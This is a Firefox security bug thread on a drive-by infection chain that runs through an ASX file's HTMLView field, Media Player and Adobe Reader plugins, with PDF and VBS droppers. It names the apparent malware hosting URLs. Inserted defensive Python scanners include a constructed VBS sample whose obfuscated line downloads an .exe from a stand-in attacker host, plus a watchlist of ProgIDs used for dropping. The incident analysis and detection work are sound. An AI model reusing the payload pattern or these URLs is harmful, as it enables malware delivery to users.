In ff a site silently opens an asx file and, if MediaPlayer (default) opens it, an exploit in IE or other MS components allows code execution

Status: NEW (Unassigned)

Product: Firefox
Component: Security
Priority: --
Severity: critical
Reported: 8 years ago
Last modified: 6 years ago

People: Reporter: Max Vlasov; Assignee: Unassigned

Tracking: Blocks 1 bug; Keywords: sec-vector

Firefox Tracking Flags: Not tracked

Details: Whiteboard: [sg:vector-critical wmp/ie/hcp]

Attachments: 3

Description (Reporter, 8 years ago)
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10
Build Identifier: probably 3.5.14 (Because of the exploit the machine is no longer working, ver. of the browser)

The following steps in FireFox led to infection of the computer (I tracked them with my backup and the sqlite database ff uses):
- I just visited the site http://onlyumpc.com/news/hit-those-hidden-butons-umpc-scrollbar-utility. The contacts page on the site is blank, no other info is available except that it is registered with the godaddy.com hoster
- It has an automatic file activation (http://flywintech.com/px/tmp/u.asx) that opened Windows Media Player on my XP machine and silently installed badware. When this happened I did not notice anything special, just closed the media player. Only later did my inquiry show what happened

My brief research showed me that a potential flaw in the HTMLView field of the asf file can lead to IE code execution; this was revealed by Petko Petkov 3 years ago ( http://www.gnucitizen.org/blog/backdooring-windows-media-files/ )
Also metasploit released working code about a month ago ( https://www.metasploit.com/redmine/projects/framework/repository/changes/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb ) that has all the properties I saw, including a "smallest gif" 

Reproducible: Always

Steps to Reproduce:
1. visited the site http://onlyumpc.com/news/hit-those-hidden-butons-umpc-scrollbar-utility (due to my activity they might hide the exploit)
2. Automatically http://flywintech.com/px/tmp/u.asx is activated. If this does not happen, just download the file; it is still available. It has an HTMLView field pointing to http://flywintech.com/px/tmp/hcp.html, which contains mixed html/javascript code.
Actual Results:  
Computer infected with windows binary code (in my case a service is installed)

Expected Results:  
No arbitrary code execution

I hope that, due to the danger of this activity, automatic asf file opening will be disabled by default.

Comment 1 (8 years ago)
What version of Windows Media Player and IE were on your computer?  I'm curious whether out-of-date components were involved.

If you use a new Firefox profile, does Firefox prompt before opening WMP?  Firefox is supposed to prompt unless you check "don't ask me again" or "always this action for this question" for a given file type or external protocol.
Blocks: 512788
Group: core-security
Comment 2 (Reporter, 8 years ago)
Created attachment 458582 [details]
u.asx as it appeared in the firefox disk cache (including http headers) and hcp.html downloaded 2010.07.20

----- u.asx
This entry was extracted from the firefox cache backed up from the infected machine. According to my inquiry, the http headers show the exact moment the machine was infected

----- hcp.html
this entry was downloaded using a 3rd-party tool (javascript unaware) 2010.07.20
in u.asx it is referenced as 
  <PARAM name="HTMLView" value="http://flywintech.com/px/tmp/hcp.html"/>

Since this file is possibly interpreted by the MediaPlayer/IE engine, I could not find it in the firefox cache, so I just downloaded it 2010.07.20 with my http downloading tool, which is unaware of javascript and therefore safe
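As an added example (not part of the bug, its attachments, or the reporter's tooling): a small Python scanner for the pattern found in u.asx above, an ASX playlist whose HTMLView PARAM sends Windows Media Player's embedded IE engine to a second URL. It runs over a constructed sample ASX with placeholder hostnames, not the real u.asx, reports every HTMLView URL, and notes when that URL's host differs from the hosts of the media REF entries. ASX is case-insensitive and frequently not well-formed XML, so the scan uses a tolerant regex rather than an XML parser.

```python
import re
from urllib.parse import urlparse

# Constructed sample in the shape the reporter describes: a media REF plus an
# HTMLView PARAM pointing WMP's embedded IE pane at a second host. Hostnames
# are placeholders; this is not the real u.asx.
SAMPLE_ASX = """<ASX version="3.0">
  <TITLE>clip</TITLE>
  <ENTRY>
    <REF href="http://media.example.net/clip.wmv" />
    <PARAM name="HTMLView" value="http://attacker.example.org/px/tmp/page.html" />
  </ENTRY>
</ASX>"""

# A plain playlist for comparison, also constructed.
BENIGN_ASX = """<asx version="3.0"><entry><ref href="mms://media.example.net/live" /></entry></asx>"""

# ASX is case-insensitive and often not well-formed XML, so scan with a
# tolerant regex instead of an XML parser that would reject real-world files.
_TAG = re.compile(r"<\s*(ENTRYREF|REF|PARAM)\b([^>]*)>", re.I | re.S)
_ATTR = re.compile(r'(\w+)\s*=\s*"([^"]*)"', re.S)


def parse_asx(text):
    """(TAG, {attr: value}) for every REF, ENTRYREF and PARAM element."""
    items = []
    for m in _TAG.finditer(text):
        attrs = {k.lower(): v for k, v in _ATTR.findall(m.group(2))}
        items.append((m.group(1).upper(), attrs))
    return items


def media_refs(text):
    """href of every REF/ENTRYREF, i.e. what WMP actually streams."""
    return [a["href"] for tag, a in parse_asx(text)
            if tag in ("REF", "ENTRYREF") and "href" in a]


def htmlview_urls(text):
    """URLs that WMP will render with its embedded IE engine."""
    return [a["value"] for tag, a in parse_asx(text)
            if tag == "PARAM" and a.get("name", "").lower() == "htmlview"
            and "value" in a]


def assess(text):
    """Any HTMLView at all is an IE instance behind a media file; a host that
    matches no media REF is the extra hint seen in this bug."""
    refs = media_refs(text)
    views = htmlview_urls(text)
    media_hosts = {urlparse(u).hostname for u in refs}
    findings = []
    for u in views:
        note = "HTMLView hands this URL to WMP's embedded IE engine"
        if urlparse(u).hostname not in media_hosts:
            note += "; its host differs from every media REF"
        findings.append((u, note))
    return {"refs": refs, "htmlview": views, "findings": findings,
            "verdict": "suspicious" if views else "clean"}


if __name__ == "__main__":
    for name, asx in (("sample", SAMPLE_ASX), ("benign", BENIGN_ASX)):
        print(name, assess(asx))
```

Because the Content-Type is handed to the WMP plugin without a prompt, this is an after-the-fact check to run over a browser disk cache or proxy capture, which is where the reporter recovered u.asx from.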
Comment 3 (Reporter, 8 years ago)
I managed to restore the machine this happened on. So, additional version information:

FireFox: 
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)

MediaPlayer: possibly 9. I temporarily disabled the player; the file that still resides in the folder (wmplayer.exe) reports 9.00.00.4503. I didn't care for MediaPlayer since I started using 3rd-party media players, which can possibly be the case for a general user. At least a default install of Windows XP SP2 -> SP3 -> security updates will not change the default version of the player, it would just apply some previously known security updates. 

Windows:
XP SP3, security sensitive updates included. I always manually confirm them, and if something was related to MediaPlayer, I didn't bypass it. 

Firefox didn't ask for anything; I remember it since I'm always very sensitive about such things: smallest doubt - I refuse. Moreover, when I did research on another machine using my backup data (Windows 7), this page opened this file (u.asx) also silently, but I cannot confirm this exploit since Winamp was installed there and it only showed accessing some stream. The Firefox on that machine is up to date (3.6.?) and I never confirmed any default "don't ask" for asx files, just because I never use them. 

I also attached the files involved (u.asx and hcp.html). They were zipped in order to be safe for others.
Comment 4

(In reply to comment #1)
> If you use a new Firefox profile, does Firefox prompt before opening WMP? 
> Firefox is supposed to prompt unless you check "don't ask me again" or "always
> this action for this question" for a given file type or external protocol.

WMP installs a plugin which is loaded by Content-type -- no prompt. The prompt only applies to external schemes or when there's an external helper app. We could maybe blocklist the plugin (even though WMP doesn't actually suffer from the bug) but then the content-type will trigger an attempt to launch WMP as a helper app at which point many users will have checked the "do this every time" box.

How many other apps out there call IE explicitly rather than the default browser? As long as there is one attackers can always create innocuous-looking content that users may open up, creating a chain from content in Firefox to content in IE with more or fewer required clicks from users. The real problem here is the unfixed HCP windows bug.

The onlyumpc site was probably hacked, the first line of http://onlyumpc.com/wp-content/themes/onlyumpc-v2/js/k2functions.js contains obfuscated script unrelated to the rest of the file that turns into a <script> tag of /data/mootools.js on one of 124 hosts randomly selected (31 subdomains times four domains). SafeBrowsing blocks one of the domains completely (gaindirectory.org), and many other hosts return error pages, but some are still active. Currently I can reach obfuscated attack code at http://lime.ideacoreportal.com/data/mootools.js
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [sg:vector-critical wmp/ie/hcp]
Comment 5

Created attachment 458956 [details]
one variant of mootools.js

Here's an example of what I got from lime.ideacoreportal.com/data/mootools.js -- it seemed encoded differently each time I loaded it, but structurally the same, so probably just obfuscation differences. Haven't decoded it further yet.
Comment 6 (Reporter, 8 years ago)
I confirm the plugin Daniel mentioned, listed as

== Windows Media Player Plug-in Dynamic Link Library 3.0.2.629
== npdsplay.dll

on the previously infected computer
Comment 7 (Reporter, 8 years ago)
I don't know whether it will help or not, but while trying to figure things out with onlyumpc.com the next day (17.07.2010) on another computer, a new item from flywintech appeared in the ff cache (http://flywintech.com/px/index.php); currently it seems it is not available on the site (I have a copy from that day). 

It was detected as HTML:Downloader-S on virustotal by 3 AV products, and Avast listed it as added 14.7.2010
The file starts with <body><applet code='dev.s.AdgredY' archive='tmp/des.jar'
Possibly some automatically downloaded html intended directly for IE users and having no effect in ff
Comment 8 (Reporter, 8 years ago)
I have some thoughts about how it could be fixed. 

Confirmations are a compromise that we at least have currently. For example the shortest unbreakable chain is exe activation: there will be a confirmation box, and if no AV is installed, the user will be infected. 

The question is: is it technically possible to develop and silently install (when ff is not running) a plugin that will bypass the exe confirmation? If it's not possible, ok.. vbs activation? The list of dangerous file formats isn't short. So maybe a blacklist should exist, of types that no plug-in can override for auto-activation. And from version to version, if a vulnerability is found for a new type, it can be extended with it. Even if we ended up with a bad user experience, asking for confirmation for every possible file format so far, maybe a next step would be to introduce a setting to disable it for those who know what they're doing.

Comment 9 (8 years ago)
plugins can be dropped into firefox folders at any time w/o any confirmation from firefox.

user state is owned by the user, so if a bad application wants to update the user's firefox plugin cache while firefox isn't running so that firefox thinks it already approved a given plugin, that application running as that user can do so.

the general assumption is that plugins are installed by users for themselves and asking users to confirm something which they presumably intentionally did will just cause them to:
1. get annoyed
2. blindly click a confirm button
3. ignore the message in the future
Comment 10 (Reporter, 8 years ago)
It's interesting that there's no such file as npdsplay.dll in any of the ff subfolders

Searching led to the following (CMIIW):
- According to http://kb.mozillazine.org/Windows_Media_Player the plug-in is installed through plug-in scanning of external folders. I was not aware of such a thing.  
- This plug-in has existed for ages (actually since Netscape times), according to http://technet.microsoft.com/en-us/library/bb676136.aspx 

"As Netscape Navigator cannot communicate directly with Microsoft ActiveX controls, Microsoft Windows Media Player includes a plug-in (Npdsplay.dll) to allow users of Netscape Navigator to watch ASF content." 

Earliest mention on microsoft.com: http://support.microsoft.com/kb/243505
Contents of the Mplayer2.cab (IE 4.01 Service Pack 2)...
... Npdsplay dll       347,648  06-25-98  8:55A Npdsplay.dll

Just wondering, can this system of external scanning be a potential security threat? I am personally almost ready to disable external scanning completely in my ff.

Comment 11 (8 years ago)
security is generally defined as keeping bad things out of a closed system.

once bad stuff is in your closed system, it's too late.

the ability for someone to run code which installs a plugin on your system means they can first and foremost: RUN CODE ON YOUR SYSTEM.

IOW: "No".

Comment 12 (8 years ago)
Using a combination of technical and social methods, we could prevent honest software vendors from silently installing stuff into Firefox.  See bug 565565 comment 1.

Whether it's worth the ux-interruption, or would actually improve security in cases like this one, is another question.
Comment 13 (Reporter, 8 years ago)
Jess, I agree, there's something we can do.
Also, as for new information, I got some.
- On the second computer I mentioned I didn't find any MediaPlayer plugin, but I have a saved profile (a cache profile) that triggers asx opening. I repeated it a dozen times.
- With this working profile I tried disabling different plug-ins and restarting; the plugin that triggers asx opening is Adobe Reader, nppdf32.dll, file version 9.1.0.2009022700, MD5: 28D2C5CE5944E1B027CF5C8004CF89A1. So it looks like the path is a little bit longer.
- I switched on the LiveHeaders extension (allows monitoring HTTP headers and responses) and once I managed to catch the full F5 download leading to asx opening. I'll attach it, and also I'll attach a pdf mentioned there and the vbs mentioned in the pdf (both downloaded today using the links that appeared in the file). The strange thing is that the order of files in LiveHeaders is u.asx -> pdf, so if the pdf triggers something, u.asx is already loaded (if LiveHeaders works sequentially)

I looked at the version of Adobe Reader as a program here, it's 9.2.0; I know it's not the latest, and I haven't upgraded it yet in order to keep the current state for testing purposes. I still cannot figure out the exact trigger code allowing this chain. Any suggestions?

I also wanted to compare LiveHeaders results with Adobe Reader disabled, but unfortunately F5 on this infected page does not always work.
Comment 14 (Reporter, 8 years ago)
Created attachment 459530 [details]
Live Headers (HTTP Requests/Response) of a full reload operation

LiveHeaders - the contents of the Live Headers extension window after a successful reload (F5) operation leading to automatic asx opening

pdfopen.pdf.txt - the contents of the http://flywintech.com/px/tmp/pdfopen.pdf file (mentioned in the headers)

m.vbs.txt - the contents of the m.vbs file mentioned in http://flywintech.com/px/tmp/pdfopen.pdf 

The vbs and pdf files use StrReverse extensively to hide the names of the Windows objects used (Scripting.FileSystemObject, WScript.Shell, MSXML2.XMLHTML, ADODB.Stream)
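An added example (not the attachment's contents and not the reporter's code): a Python pass that statically undoes the StrReverse("...") obfuscation described in comment 14, including reversed strings split with "&", and then lists the CreateObject ProgIDs and URLs that become visible. The sample VBS below is constructed for this example with a placeholder hostname; it reuses the four ProgIDs named in the comment but is not m.vbs.

```python
import re

# Constructed sample in the style comment 14 describes: every ProgID is
# hidden behind StrReverse so the plain names never appear in the file.
# The hostname is a placeholder; this is not the real m.vbs.
SAMPLE_VBS = r'''
Set fso = CreateObject(StrReverse("tcejbOmetsySeliF.gnitpircS"))
Set sh  = CreateObject(StrReverse("llehS.tpircSW"))
Set req = CreateObject(StrReverse("PTTHLMX.2LMXSM"))
Set st  = CreateObject(StrReverse("maertS." & "BDODA"))
req.Open "GET", StrReverse("exe.m/pmt/xp/gro.elpmaxe.rekcatta//:ptth"), False
'''

# ProgIDs that together spell "fetch a file, write it to disk, run it";
# these are the four objects the comment lists (an analyst would extend it).
WATCHLIST = {"scripting.filesystemobject", "wscript.shell",
             "msxml2.xmlhttp", "adodb.stream"}

_STRREVERSE = re.compile(r'StrReverse\s*\(\s*"([^"]*)"\s*\)', re.I)
_CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
_CREATEOBJECT = re.compile(r'CreateObject\s*\(\s*"([^"]+)"\s*\)', re.I)
_URL = re.compile(r'https?://[^\s"\'<>]+', re.I)


def deobfuscate(source):
    """Evaluate StrReverse("literal") and "a" & "b" on the text itself until
    nothing changes, so nested calls and split-up strings also resolve."""
    prev = None
    while prev != source:
        prev = source
        source = _STRREVERSE.sub(lambda m: '"' + m.group(1)[::-1] + '"', source)
        source = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', source)
    return source


def progids(source):
    """ProgIDs passed to CreateObject, in order of appearance."""
    return _CREATEOBJECT.findall(deobfuscate(source))


def urls(source):
    """URLs that are only visible after deobfuscation."""
    return _URL.findall(deobfuscate(source))


def flag(source):
    """Sorted watchlist ProgIDs the script instantiates; empty means none."""
    return sorted(p for p in progids(source) if p.lower() in WATCHLIST)


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_VBS))
    print("ProgIDs:", progids(SAMPLE_VBS))
    print("URLs:", urls(SAMPLE_VBS))
    print("Watchlist hits:", flag(SAMPLE_VBS))
```

The point of the fixed-point loop is that a single regex substitution misses `StrReverse("maertS." & "BDODA")`: the concatenation has to be folded first, and only then does the reversal apply. Grepping the raw file for "http://" or "WScript.Shell" finds nothing; grepping the deobfuscated text finds both.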
Comment 15 (Reporter, 8 years ago)
Upgrading to the latest version (nppdf32.dll: 9.3.3.177) stopped the automatic asx downloading, at least for the saved profile I mentioned. It seems that this was fully Adobe Reader related. 

But some things still puzzle me. It looks like the u.asx download (which was actually listed in the download list) was a kind of mozilla download, but on behalf of some scripting request from a plugin. Also the full path of actions is still hidden behind a complex logic.

Another thing. As long as the "You should upgrade your flash..." warning was at least once used on the Your Browser Updated page, is it possible to do the same for the Adobe Reader plugin from time to time?
Keywords: sec-other
Keywords: sec-vector
Keywords: sec-other